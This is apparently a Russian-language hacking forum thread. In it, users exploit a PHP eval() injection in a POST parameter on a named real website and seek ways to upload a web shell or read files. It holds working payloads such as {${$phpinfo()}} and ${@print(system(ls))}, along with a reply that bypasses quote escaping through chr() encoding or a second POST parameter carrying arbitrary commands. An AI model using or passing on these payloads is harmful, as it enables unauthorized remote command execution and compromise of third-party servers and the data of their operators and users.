Нашел уязвимость в POST параметре option_id на сайте http://www. shans.com. ua/ HackBar'ом передаю POST запрос option_id={${$print(1)}}{${$print(1)}}{${$print(1)}} option_id={${$phpinfo()}} Скрипт отрабатывает.... Данные передаются в eval() Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init().... Непойму почему данные передаются в "{}" без ";" Вот так не работает {${$a=1; $print($a);}... А так выводит данные - {${$a=1}}{${$print($a)}} в гугле не нашел как выглядит данный скрипт... Если есть чтото подобное киньте ссылку...
Добырый день есть пост запрос Code: submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system(ls))}\ Кавычки экранируются, подскажите как обойти? base64 не помогло
функцией chr() Code: @print(system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(108).CHR(97))) или подстановкой пост параметра: Code: submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system($_POST[cmd]))}\&cmd=ls -la